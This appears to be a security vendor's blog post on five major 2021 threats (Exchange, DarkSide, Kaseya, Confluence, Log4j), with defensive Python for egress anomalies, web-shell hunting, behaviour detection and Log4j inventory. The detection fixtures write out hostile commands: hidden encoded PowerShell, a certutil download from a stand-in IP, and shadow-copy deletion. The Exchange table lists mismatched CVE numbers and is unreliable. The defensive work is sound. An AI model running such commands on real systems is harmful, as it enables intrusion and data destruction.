2021 was a busy year for the cyber security community. Emerging threats posed many challenges to security professionals and created many opportunities for threat actors. Picus has curated a list of the top five threats observed in 2021, detailing ten lessons defenders can learn from them.
Microsoft Exchange Server Vulnerabilities
In January 2021, Volexity detected a large amount of egress data traffic on its customers’ Microsoft Exchange Servers [1]. It later discovered that several vulnerabilities had been exploited for unauthorized data exfiltration by an APT group called HAFNIUM. In March 2021, Microsoft released several updates to patch zero-day vulnerabilities found in Microsoft Exchange Server, affecting versions 2010, 2013, 2016 and 2019 [2]. Details of the vulnerabilities are provided below:
| CVE Number | Vulnerability Type | CVSS Score |
| --- | --- | --- |
| CVE-2021-26885 | Remote Code Execution | 9.8 (Critical) |
| CVE-2021-26887 | Remote Code Execution | 7.8 (High) |
| CVE-2021-26888 | Remote Code Execution | 7.8 (High) |
| CVE-2021-27065 | Remote Code Execution | 7.8 (High) |
Exploitation of these vulnerabilities affected 250,000 servers around the world [3].
At Picus, we published a detailed blog post about the Tactics, Techniques, and Procedures (TTPs) used by HAFNIUM to target Microsoft Exchange Servers.
Lessons learned:
1. Continuously check your network traffic for anomalies
Vendors’ response times to vulnerabilities can be longer than expected. Although exploitation of these vulnerabilities was first reported in January, Microsoft released patches in March. Organizations that waited for a patch were exposed to exploitation for nearly 2 months. Therefore, network traffic should be monitored at all times and analysed for unusual activity.
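The egress anomaly that started the Volexity investigation is the kind of signal a per-host baseline surfaces without any signature. The following is an added example, not code from the Picus post: it sums outbound bytes per host and day from constructed flow summaries and flags a host whose latest day exceeds its own 7-day baseline by more than three standard deviations and by at least 1 MB. The baseline length, sigma and minimum excess are assumptions to tune per environment.

```python
"""Flag hosts whose daily outbound byte volume departs from their own baseline.

Added example, not code from the Picus post. The flow summaries below are
constructed; the 7-day baseline, the 3-sigma threshold and the 1 MB minimum
excess are assumptions to tune per environment.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed per-flow summaries: (day_number, source_host, bytes_out).
# mail01 behaves normally for seven days and then pushes ~48 MB out on day 8;
# web01 is a noisy host whose day 8 is high but inside its own variance.
FLOWS = [
    (1, "mail01", 2_100_000), (2, "mail01", 1_900_000), (3, "mail01", 2_300_000),
    (4, "mail01", 2_000_000), (5, "mail01", 2_200_000), (6, "mail01", 1_800_000),
    (7, "mail01", 2_100_000), (8, "mail01", 48_000_000),
    (1, "fileshare", 5_000_000), (2, "fileshare", 5_100_000), (3, "fileshare", 4_900_000),
    (4, "fileshare", 5_200_000), (5, "fileshare", 5_000_000), (6, "fileshare", 4_800_000),
    (7, "fileshare", 5_100_000), (8, "fileshare", 5_200_000),
    (1, "web01", 10_000_000), (2, "web01", 30_000_000), (3, "web01", 12_000_000),
    (4, "web01", 28_000_000), (5, "web01", 15_000_000), (6, "web01", 25_000_000),
    (7, "web01", 11_000_000), (8, "web01", 32_000_000),
]


def daily_egress(flows):
    """Sum bytes_out per host and day (several flows per host/day add together)."""
    totals = defaultdict(lambda: defaultdict(int))
    for day, host, nbytes in flows:
        totals[host][day] += nbytes
    return totals


def egress_anomalies(flows, baseline_days=7, sigma=3.0, min_excess=1_000_000):
    """Return hosts whose most recent day exceeds mean + sigma * stdev of the
    preceding baseline_days, by at least min_excess bytes.

    The absolute floor matters: a host with an almost flat baseline has a
    near-zero standard deviation, so a few kilobytes of extra traffic would
    otherwise breach the purely statistical threshold.
    """
    findings = []
    for host, per_day in daily_egress(flows).items():
        days = sorted(per_day)
        if len(days) < baseline_days + 1:
            continue  # not enough history to judge this host yet
        history = [per_day[d] for d in days[-baseline_days - 1:-1]]
        latest_day, latest = days[-1], per_day[days[-1]]
        mu, sd = mean(history), pstdev(history)
        threshold = mu + sigma * sd
        if latest > threshold and latest - mu >= min_excess:
            findings.append({
                "host": host, "day": latest_day, "bytes_out": latest,
                "baseline_mean": round(mu), "threshold": round(threshold),
            })
    return findings


if __name__ == "__main__":
    for f in egress_anomalies(FLOWS):
        print(f"{f['host']}: day {f['day']} sent {f['bytes_out']:,} bytes "
              f"(baseline mean {f['baseline_mean']:,}, threshold {f['threshold']:,})")
```

Only mail01 is reported: fileshare's small rise is within its threshold and below the absolute floor, and web01's high day is inside the variance of its own history. A per-host baseline like this is what keeps a noisy web server from drowning out a mail server that suddenly sends twenty times its normal volume.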
2. Perform threat hunting after patching
In the case of the Microsoft Exchange Server vulnerabilities listed above, the patches remediated the vulnerabilities and blocked new exploitation attempts. However, threat actors still had unauthorized access to servers that had been exploited before patching. Therefore, it is important to perform threat hunting and to assume that the vulnerabilities may have been exploited before the patch was applied. Check for leftover artifacts of the threat actors and make sure to remove any malicious files from your network.
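One concrete form of the post-patch hunt described above is to look for script files that appeared in a web root during the exposure window and that do not match a known-good manifest. The following is an added example, not a Picus tool: it walks a constructed web root, keeps only script files whose modification time falls between the first public exploitation report and the day the patch was applied, and drops those whose SHA-256 is in a baseline manifest (which in practice comes from a clean install or a known-good backup). The window dates, file names and contents are constructed assumptions.

```python
"""Post-patch hunt for script files dropped into a web root during the exposure window.

Added example, not a Picus tool. Assumes a baseline manifest of SHA-256 hashes
taken from a clean install or known-good backup; the window (first public
exploitation report to the day the patch was applied) and the sample files are
constructed.
"""
import hashlib
import os
import tempfile
from datetime import datetime, timezone

SCRIPT_EXT = (".aspx", ".ashx", ".asmx", ".php", ".jsp")


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hunt(web_root, baseline_hashes, window_start, window_end):
    """Return script files modified inside [window_start, window_end] whose
    content hash is not in the baseline. Vendor files touched by the patch
    itself stay quiet because their post-patch hash is in the manifest."""
    hits = []
    for dirpath, _, files in os.walk(web_root):
        for fn in files:
            if not fn.lower().endswith(SCRIPT_EXT):
                continue
            path = os.path.join(dirpath, fn)
            mtime = os.path.getmtime(path)
            if not (window_start <= mtime <= window_end):
                continue
            digest = sha256_of(path)
            if digest in baseline_hashes:
                continue
            hits.append({
                "path": os.path.relpath(path, web_root).replace(os.sep, "/"),
                "modified": datetime.fromtimestamp(mtime, timezone.utc).isoformat(),
                "sha256": digest,
            })
    return sorted(hits, key=lambda h: h["path"])


def _ts(y, m, d):
    return datetime(y, m, d, tzinfo=timezone.utc).timestamp()


def build_sample_root(root):
    """Create a constructed web root; returns the baseline hash set the vendor would ship."""
    files = {
        # relative path: (content, mtime, shipped in the vendor manifest?)
        "owa/auth/logon.aspx": (b"<%@ Page %> vendor logon page", _ts(2020, 10, 1), True),
        "ecp/default.aspx": (b"<%@ Page %> vendor page, replaced by the patch", _ts(2021, 3, 10), True),
        "owa/auth/diag.aspx": (b"<%@ Page %> unknown page, not in manifest", _ts(2021, 2, 28), False),
        "owa/auth/legacy.aspx": (b"<%@ Page %> unknown but pre-dates the window", _ts(2019, 5, 5), False),
        "owa/readme.txt": (b"not a script, never examined", _ts(2021, 2, 28), False),
    }
    baseline = set()
    for rel, (content, mtime, in_baseline) in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
        os.utime(path, (mtime, mtime))
        if in_baseline:
            baseline.add(hashlib.sha256(content).hexdigest())
    return baseline


def demo():
    """Build the sample root in a temp directory and run the hunt over it."""
    with tempfile.TemporaryDirectory() as root:
        baseline = build_sample_root(root)
        # Constructed window: first exploitation report (January) to patch day (March).
        return hunt(root, baseline, _ts(2021, 1, 1), _ts(2021, 3, 15))


if __name__ == "__main__":
    for hit in demo():
        print(hit["modified"], hit["path"], hit["sha256"][:16])
```

Only `owa/auth/diag.aspx` is reported: the vendor page replaced by the patch is in the manifest, the old unknown file predates the window and the text file is never examined. Modification times are a first pass only, since an intruder can reset them; cross-check candidates against creation timestamps from the file system journal and against the web server's request logs before deciding what to remove.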
DarkSide Ransomware Campaign
The DarkSide ransomware group provided Ransomware as a Service (RaaS) to other threat actors. According to Elliptic, this campaign extorted over 80 million USD in 2021 [4]. Most notably, US-based Colonial Pipeline Company paid 4.4 million USD after its operations were brought to a halt by this ransomware campaign in May 2021. After the ransom was paid, the pipeline slowly regained its operational capabilities.
We published a whitepaper about the Tactics, Techniques, and Procedures (TTPs) and the tools utilized by the DarkSide threat actors.
Lessons Learned:
3. Practice risk management for the worst case event
When ransomware threat actors infect critical infrastructure, they hold hostage both the company and its customers. When Colonial Pipeline Company was hit by ransomware, fuel shortages occurred across the US and some airports could not provide fuel to airlines. This was one of the worst-case scenarios for the company and for society. Practicing risk management for assets is important to estimate and understand the possible outcomes of a cyber attack.
4. Implement behaviour-based detection
Ransomware is evolving and mostly uses legitimate tools that organizations have already whitelisted. Therefore, signature-based detection falls short against it. Behavior-based detection and proactive approaches such as attack simulation and security control validation become more important each day.
This lesson is also a key recommendation from Picus Labs to help detect and respond to the techniques identified in the Red Report 2021.
See Picus in Action
Watch how you can easily simulate DarkSide ransomware to assess your security posture and prevent them with signatures of your WAF, IPS, and NGFW.
Kaseya MSP Supply Chain Attack
In July 2021, the REvil ransomware group (also known as Sodinokibi) launched an attack campaign against Managed Service Providers (MSPs) and thousands of their customers. Like the SolarWinds attack in 2020, the Kaseya MSP attack was a supply chain attack, delivered through a Kaseya VSA Agent Hot-fix. According to Reuters, the attack affected between 800 and 1500 businesses around the world [5]. REvil demanded 70 million USD for a universal decryptor; however, the ransomware group's website disappeared some time later. Due to the size of the attack, the amount of ransom collected is unknown. Kaseya later released a universal decryptor for the victims.
Click here to learn more about the Tactics, Techniques, and Procedures (TTPs) used by REvil in the Kaseya MSP Supply-Chain Attack.
Lessons Learned:
5. Adopt a zero trust strategy
It is nearly impossible to defend your assets against zero-day vulnerabilities in widely used services. However, by adopting a zero trust architecture in your network, which limits the access of threat actors to network assets, it is possible to significantly reduce the effects of attacks and any damage that may occur.
6. Monitor use of built-in operating system utilities
Adversaries prefer to abuse built-in tools in their attack campaigns. For example, REvil used numerous living off the land (LOL) utilities, such as PowerShell, certutil.exe, and MsMpEng.exe, to conduct the Kaseya attack campaign.
The increased prevalence of this type of adversary behavior is also a key finding of the Red Report 2021. According to the report, attackers predominantly use built-in legitimate utilities to perform all the top 10 techniques, revealing adversaries’ preference for abusing legitimate tools rather than custom ones.
You need to monitor the use of the known living off the land binaries and scripts (LOLBAS) to identify their malicious use [6].
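Lessons 4 and 6 both come down to the same detection design: judge a process by its behaviour (who launched it, what arguments it carries, where it runs from) instead of by a file signature, because the binary itself is legitimate and already allowed. The following is an added example, not Picus code: a handful of behaviour rules evaluated over constructed process-creation events shaped like a typical EDR or Sysmon record. The rules cover an Office application spawning a script host, encoded PowerShell, certutil.exe fetching a remote file, the Defender engine binary MsMpEng.exe (which the page lists among the utilities REvil used) running from outside its install directory, and shadow copy deletion. The event fields, rule names and the expected Defender install directories are assumptions.

```python
"""Behaviour-based detection over process-creation events.

Added example, not Picus code. The rules key on what a process does (who
launched it, its arguments, where it runs from) rather than on file hashes, so
renamed or repacked copies of legitimate tools still match. Events, field
names, rule names and the expected Defender install directories are
constructed assumptions.
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Directories the Defender engine binary legitimately runs from (assumption).
DEFENDER_DIRS = ("c:\\program files\\windows defender\\",
                 "c:\\programdata\\microsoft\\windows defender\\platform\\")

# Constructed events in the shape of a typical EDR / Sysmon process-creation record.
EVENTS = [
    {"id": 1, "host": "ws-17", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -hashfile C:\Users\bob\setup.msi SHA256"},           # benign use
    {"id": 2, "host": "ws-17",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc QQBCAEMA"},                 # 'ABC' as UTF-16 base64
    {"id": 3, "host": "srv-vsa", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -urlcache -split -f http://198.51.100.7/update.crt C:\Temp\update.crt"},
    {"id": 4, "host": "srv-vsa", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Temp\MsMpEng.exe", "cmd": "MsMpEng.exe"},               # engine outside install dir
    {"id": 5, "host": "srv-fs", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\Windows Defender\MsMpEng.exe", "cmd": "MsMpEng.exe"},  # legitimate
    {"id": 6, "host": "srv-fs", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin delete shadows /all /quiet"},
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawns_script_host(e):
    return basename(e["parent"]) in OFFICE_APPS and basename(e["image"]) in SCRIPT_HOSTS


def encoded_powershell(e):
    # -e, -ec, -enc and -EncodedCommand are all accepted spellings of the switch.
    return basename(e["image"]) in {"powershell.exe", "pwsh.exe"} and bool(
        re.search(r"(^|\s)-e(c|nc|ncodedcommand)?(\s|$)", e["cmd"], re.I))


def certutil_download(e):
    return basename(e["image"]) == "certutil.exe" and "-urlcache" in e["cmd"].lower()


def defender_engine_off_path(e):
    img = e["image"].lower()
    return basename(img) == "msmpeng.exe" and not img.startswith(DEFENDER_DIRS)


def shadow_copy_deletion(e):
    return basename(e["image"]) == "vssadmin.exe" and bool(
        re.search(r"delete\s+shadows", e["cmd"], re.I))


RULES = [
    ("office_spawns_script_host", office_spawns_script_host),
    ("encoded_powershell", encoded_powershell),
    ("certutil_download", certutil_download),
    ("defender_engine_off_path", defender_engine_off_path),
    ("shadow_copy_deletion", shadow_copy_deletion),
]


def evaluate(events, rules=RULES):
    """Return (event_id, host, rule_name) for every rule each event matches."""
    return [(e["id"], e["host"], name) for e in events for name, rule in rules if rule(e)]


if __name__ == "__main__":
    for event_id, host, rule_name in evaluate(EVENTS):
        print(f"event {event_id} on {host}: {rule_name}")
```

Events 1 and 5 are the same binaries used legitimately (certutil hashing a file, the Defender engine started by services.exe from its install directory) and produce no alert, which is the point: the rule fires on the combination of binary, arguments, parent and path, not on the binary alone. Rule definitions of this shape map directly onto what a SIEM or EDR query language expresses, so the same logic can be validated by replaying the simulated technique and checking that the alert appears.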
Atlassian Confluence Remote Code Execution Vulnerability
In August 2021, a remote code execution vulnerability with a CVSS score of 9.8 (critical) was disclosed by Atlassian. This vulnerability affected Atlassian Confluence Server and Confluence Data Center versions prior to 6.13.23, 7.4.11, 7.11.6, 7.12.5 and 7.13.0. US-CERT and CISA warned about mass exploitation of the vulnerability, urging organizations to apply the necessary updates [7]. It was mostly exploited by crypto-mining malware.
Lessons Learned:
7. Maintain strict supervision of your public-facing applications
Public-facing applications are a common initial access point into any network, and threat actors often exploit vulnerabilities in these services. When a critical vulnerability is found in a public-facing service, it is often used as an entry point for mass exploitation and lateral movement. The traffic received by these services should be monitored, and security controls such as NGFW and WAF should be properly configured and validated.
8. Test the effectiveness of your security controls
Investing in security control devices does not provide complete assurance that your important assets are secure. Policy weaknesses and misconfigurations can create gaps for attackers to exploit, so regularly test your controls to confirm that they are deployed correctly and tuned to defend against the latest threats. After applying a patch or a configuration change, test that the affected devices are working as intended.
Apache Log4j Vulnerabilities
In December 2021, four vulnerabilities were disclosed in the Apache Log4j library. Details of the vulnerabilities are given below:
| CVE Number | Vulnerability Type | CVSS Score |
| --- | --- | --- |
| CVE-2021-44228 | Remote Code Execution | 10.0 (Critical) |
| CVE-2021-45046 | Remote Code Execution | 9.0 (Critical) |
| CVE-2021-45105 | Denial of Service | 7.5 (High) |
| CVE-2021-44832 | Remote Code Execution | 6.6 (Medium) |
This library has been downloaded millions of times, and the number of applications that use it is unknown. According to the Microsoft Threat Intelligence Center (MSTIC), multiple APT groups are exploiting the Log4j vulnerabilities [8].
Lessons Learned:
9. Improve visibility of your software inventory
It is hard to pinpoint assets with vulnerable Log4j libraries. Even if your organization does not use Log4j in any of its own assets, third-party services may use it without disclosing this information. Improve supply chain transparency and keep track of third-party assets and their components.
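The reason Log4j is hard to pinpoint is that log4j-core rarely sits on disk as a plain jar: it is bundled inside wars, ears and fat jars, sometimes repackaged without its Maven metadata. The following is an added example, not Picus tooling, of the inventory step: it walks a directory, opens every Java archive, recurses into archives nested inside archives, and reports each log4j-core it finds with the version read from the library's own `pom.properties`. The two marker paths (`JndiLookup.class` and the log4j-core `pom.properties`) are the real entry names inside log4j-core; the sample archives are constructed in a temporary directory so the script runs offline, and the version cut-offs follow the mainline 2.x fixes (2.15.0 for CVE-2021-44228, 2.17.1 for CVE-2021-44832). The Java 6/7 maintenance branches (2.3.x, 2.12.x) shipped their own fixed releases and would need separate handling.

```python
"""Inventory Java archives for a bundled log4j-core, including copies nested in
wars, ears and fat jars.

Added example, not Picus tooling. JNDI_CLASS and POM_PROPS are the real entry
paths inside log4j-core; the sample archives, assessment strings and the
mainline-2.x version cut-offs are constructed for the demo (the 2.3.x and
2.12.x maintenance branches have their own fixed releases).
"""
import io
import os
import tempfile
import zipfile

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(pom_properties):
    for line in pom_properties.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def version_tuple(version):
    """'2.14.1' -> (2, 14, 1); a non-numeric component such as '0-beta9' counts as 0."""
    return tuple(int(p) if p.isdigit() else 0 for p in version.split("."))


def assess(version, jndi_present):
    if version is None:
        return "log4j-core detected, version unknown: inspect manually"
    v = version_tuple(version)
    if v < (2, 15, 0) and jndi_present:
        return "vulnerable to CVE-2021-44228 (JndiLookup present, below 2.15.0)"
    if v < (2, 17, 1):
        return "upgrade: below 2.17.1 (CVE-2021-45046/45105/44832 fixes)"
    return "current"


def inspect_archive(zf, location, findings):
    """Record log4j-core evidence in one open archive, then recurse into nested archives."""
    names = set(zf.namelist())
    if JNDI_CLASS in names or POM_PROPS in names:
        version = None
        if POM_PROPS in names:
            version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
        findings.append({"location": location, "version": version,
                         "jndi_lookup_present": JNDI_CLASS in names,
                         "assessment": assess(version, JNDI_CLASS in names)})
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                nested = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            with nested:
                inspect_archive(nested, f"{location}!/{name}", findings)


def scan_tree(root):
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in sorted(files):
            if not fn.lower().endswith(ARCHIVE_EXT):
                continue
            path = os.path.join(dirpath, fn)
            try:
                zf = zipfile.ZipFile(path)
            except zipfile.BadZipFile:
                continue
            with zf:
                inspect_archive(zf, os.path.relpath(path, root).replace(os.sep, "/"), findings)
    return findings


def _make_zip(target, entries):
    with zipfile.ZipFile(target, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)


def build_sample_tree(root):
    """Constructed archives carrying only the marker entries, not the real library bytes."""
    magic = b"\xca\xfe\xba\xbe"
    _make_zip(os.path.join(root, "log4j-core-2.14.1.jar"),
              {JNDI_CLASS: magic, POM_PROPS: b"version=2.14.1\nartifactId=log4j-core\n"})
    inner = io.BytesIO()
    _make_zip(inner, {JNDI_CLASS: magic, POM_PROPS: b"version=2.17.1\nartifactId=log4j-core\n"})
    _make_zip(os.path.join(root, "app.war"),
              {"WEB-INF/lib/log4j-core-2.17.1.jar": inner.getvalue(), "index.html": b"<html></html>"})
    _make_zip(os.path.join(root, "shaded-service.jar"), {JNDI_CLASS: magic})  # repackaged, no pom
    _make_zip(os.path.join(root, "commons-io.jar"), {"org/apache/commons/io/IOUtils.class": magic})


def demo():
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['location']}: version={f['version']} -> {f['assessment']}")
```

The shaded jar is the case that defeats a version-string search: the class is present but the Maven metadata is gone, so the scanner can only say that log4j-core is there and needs a manual check. Run against real hosts, the `location` field (archive, then `!/` and the nested path) is what lets you take the finding back to the third-party package that bundled it.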
10. Better utilize security controls
Due to the widespread use of Log4j, vulnerable assets can be anywhere, and patching them might be out of your hands, especially for third-party assets. While waiting for other vendors to patch their vulnerable assets, validate your security controls and test your security posture.